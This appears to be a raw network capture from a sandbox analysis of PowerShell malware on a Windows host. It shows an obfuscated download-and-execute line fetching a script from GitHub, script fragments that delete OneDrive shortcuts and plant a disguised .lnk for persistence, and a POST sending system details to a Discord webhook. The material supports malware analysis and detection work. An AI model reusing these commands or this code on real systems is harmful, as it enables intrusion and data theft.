                                                            2024-10-15 14:00:00 UTC397INHTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 14:00:00 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 450
                                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d30553bfba7e583-DFW
                                                            2024-10-15 14:00:00 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 14:00:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.649751185.199.109.1334434040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:00 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:00 UTC900INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:00 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdfw8210028-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729000801.737276,VS0,VE1
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: 6d960304796e585a4c9bc104498d922236ccb622
                                                            Expires: Tue, 15 Oct 2024 14:05:00 GMT
                                                            Source-Age: 6
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                            2024-10-15 14:00:00 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.649763185.199.109.1334431396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:02 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:02 UTC900INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:02 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120100-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729000802.271037,VS0,VE1
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: e9a29f95479decc915379970715c73aaee90c4a2
                                                            Expires: Tue, 15 Oct 2024 14:05:02 GMT
                                                            Source-Age: 8
                                                            2024-10-15 14:00:02 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                            2024-10-15 14:00:02 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                            2024-10-15 14:00:02 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                            2024-10-15 14:00:02 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                            2024-10-15 14:00:02 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                            2024-10-15 14:00:02 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.649832162.159.136.2324431396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:15 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:15 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 65 6e 67 69 6e 65 65 72 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 37 47 4f 4d 52 4e 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 7GOMRN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 14:00:15 UTC1259INHTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 14:00:15 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729000817
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jff%2FeMVO2KG17lc8vGu0fRk5DWy%2FjJU23fOMhXWfuWEM2og69ON5FdHTrRS%2F7lRPnuRdrtajEZQeGicHz9%2B2WpVkcWUXDmioWOAUEcdAeldMhKptrUUT%2Bujk1d7U"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=69e39aecfecfdac47cfdc161cc57c10f88539518-1729000815; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=Ho1f9XAeszMYfSRJmyoAWCg.9y_pkJ1rIfYEaAZhERE-1729000815740-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d305599ab2f478d-DFW
                                                            2024-10-15 14:00:15 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.649885172.67.19.244432248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:25 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:25 UTC397INHTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 475
                                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d3055d50d790bc7-DFW
